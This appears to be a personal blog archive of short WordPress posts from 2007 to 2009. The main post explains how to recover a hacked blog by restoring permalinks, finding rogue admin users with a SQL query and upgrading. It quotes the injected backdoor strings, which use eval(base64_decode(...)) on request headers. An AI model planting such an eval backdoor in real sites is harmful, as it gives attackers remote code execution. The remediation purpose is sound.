Posts Tagged ‘SEO’

What to do if your blog was hacked by evil eval

Saturday, September 5th, 2009

Weird things happens. Mostly in WordPress. One morning you see that your permalinks became a something like this:

blah/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

Or this:

/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

Or your feed crapped like this:

error on line 22 at column 71: xmlParseEntityRef: no name wordpress

Do not panic – you’re hacked. And there is three steps to get rid of it.

1) Restore your permalinks
Go to Admin panel -> Settings -> Permalinks.
Set your permalink structure to whatever it was earlier. If you don’t even imagine what it was – you can always ask google for it – just like this: site:yourblogurl.com – and you’ll see the answer in the links to your site.

2) Kill the intruder(s)
Go to your preferred mysql administration tool (say, MySqlAdmin) and run this code in the SQL window:

SELECT * FROM `wp_usermeta`
WHERE `meta_value` LIKE '%script%'

You’ll see the list of records, write down user_ids of those guys.
Go to Admin panel -> Users -> Authors & Users, copy the edit link for any user, it’ll be somethings like:

http://yourblogurl.com/wp-admin/user-edit.php?user_id=14&wp_http_referer=%2Fwp-admin%2Fusers.php

Then paste it into address line, and change user_id=XX to the first user_id you wrote. Go.
Replace First name with whatever you want (for example “z”), insert “motherfncker@test.com” into Email field (or whatever, but remember it, you’ll need it later) and set the Role into Subscriber. Push Update user. Then repeat with the next one in your user_ids list. After you finished – just type in into the search line word “motherfncker” (or whatever you set emails to). Now – just delete bastards!

3) Defend the base
Just upgrade your wordpress. If you will do it periodically – there will be no such problems at all!

If you do not have ability to use some SQL tool – you can try to blind find bastards:
Go to Admin panel -> Users -> Authors & Users
Note the number of Admin users (right under “Users” header). One of them is you, all others – bastard ones :)
Try to find max. user_id in the list by hovering your mouse over links. Then copy the edit link of the user with topmost ID, insert it into address line, change it to next number and go. Did not work? Try the next number. Or previous one. You can even loop through all IDs not in use. And when you’ll find him – you know what to do!

Popularity: 1% [?]

Tags: , , , , ,
Posted in MySQL, Optimisation, Wordpress | No Comments »

WordPress Dashboard problem fix

Saturday, January 3rd, 2009

WordPress 2.7 offsite webshot

Heh. I’ve got “dashboard problem” in admin area. For long. ))

Now it’s over.

When you see 404 page instead of your dashboard – and somethings like “admin.php?page=index.php” in your addressbar – you just need to go to your wp-content/plugins/ directory and rename index.php there to index.html

P.S. BTW WP2.7 adminpanel looks really great! Upgrade ASAP.

Popularity: 6% [?]

Tags:
Posted in Wordpress | No Comments »

What happened to the daily show

Friday, July 20th, 2007

Many people wanna know, what happened to the daily show. And know what? I know that they do from my web-server’s logs.

So I must answer fairly – I don’t know. I really do not have any idea, what happened to the daily show.

That’s the answer :)

Popularity: 17% [?]

Tags: ,
Posted in News, Personal | No Comments »

404 in logs

Friday, July 20th, 2007

I hate 404s. I use awstats to watch my logs, and I hate when it shows some 404s…

I can tolerate some virus-generated URLs but when I see this “/feed%3Ahttp%3A//eyedmax.com/feed/“or search bot asking me for robots.txt or favicon.ico (and I haven’t one) – I can blow up.

My advices to all webmasters are following:

  • put all common files (including index.html, robots.txt and favicon.ico) to your site
  • validate the code for “strange” URLs
  • analyze log files
  • use the automatically generated site map

Don’t trouble Google ’till Google troubles you!

Popularity: 16% [?]

Tags: , ,
Posted in Optimisation, Wordpress | No Comments »

WordPress 2.2.1

Friday, June 22nd, 2007

Oops, WordPress 2.2.1 is out, and I’m still not ready!

Ok, I upgraded all the blogs with my plugs, and let’s see what happens.

Popularity: 2% [?]

Tags:
Posted in Development, News, Wordpress | No Comments »

New Wordpress

Sunday, May 20th, 2007

Hi again.
WordPress 2.2 Getz is pretty cool ;)
Except one little thing.
Widgets.
They’re now in the core.
And (as always) one little annoying error in release code.
This bug prevents Otto’s ExecPHP from working. Another plugins that allows to run PHP code gone wild too.
No, actually they working, until you want 2 or more blocks…
Solution is CVS. You need to upload fixed version of widgets.php into your wp-includes folder.
You can take it .zipped – here.

Oh, and I think my plugs needs some widgetization too ;)

Popularity: 2% [?]

Tags:
Posted in News, WordPress plugin, Wordpress | No Comments »

WordPress 2 updated

Wednesday, April 25th, 2007

Do not forget to update your blogs to WordPress 2.1.3 and 2.0.10.
Recommended ;)

Popularity: 1% [?]

Tags:
Posted in News, Wordpress | No Comments »

New WordPress version

Tuesday, January 23rd, 2007

New WordPress version 2.1 is out.

I need to check if plug is works. Hope so ;)

P.S. Download WP 2.1

 

Popularity: 1% [?]

Tags:
Posted in News | No Comments »